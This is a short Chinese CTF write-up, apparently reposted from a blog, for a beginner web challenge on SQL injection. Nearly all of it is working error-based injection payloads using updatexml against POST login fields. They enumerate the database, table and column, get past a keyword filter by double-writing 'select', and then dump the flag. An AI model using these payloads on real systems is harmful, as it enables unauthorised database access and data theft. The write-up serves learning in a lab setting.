NU1LCTFer的成长之路-web入门-CTF中的sql注入-sql注入-2-wp
作者:互联网
sql注入-2
根据网页源代码hint添加get型参数tips
bp抓包,可以发现存在两个post型参数,name和pass,尝试了一番union联合查询注入,无法利用,遂改报错注入,这里使用updatexml
发现可以正常注入
name=admin' and updatexml(1,concat(0x7e,(select 1),0x7e),1)#&pass=111111
查当前数据库 note
name=admin' and updatexml(1,concat(0x7e,(select database()),0x7e),1)#&pass=111111
查表(note) fl4g
name=admin' and updatexml(1,concat(0x7e,(select concat(table_name) from information_schema.tables where table_schema='note' limit 0,1),0x7e),1)#&pass=111111 //失败,可能过滤了一些字符
name=admin' and updatexml(1,concat(0x7e,(seselectlect concat(table_name) from information_schema.tables where table_schema='note' limit 0,1),0x7e),1)#&pass=111111 //双写select绕过
查字段(fl4g) flag
name=admin' and updatexml(1,concat(0x7e,(seselectlect concat(column_name) from information_schema.columns where table_name='fl4g' limit 0,1),0x7e),1)#&pass=111111
dump数据
name=admin' and updatexml(1,concat(0x7e,(seselectlect flag from fl4g),0x7e),1)#&pass=111111
I
标签:NU1LCTFer,name,pass,0x7e,#&,sql,updatexml,concat,注入 来源: https://blog.csdn.net/weixin_46439278/article/details/118343647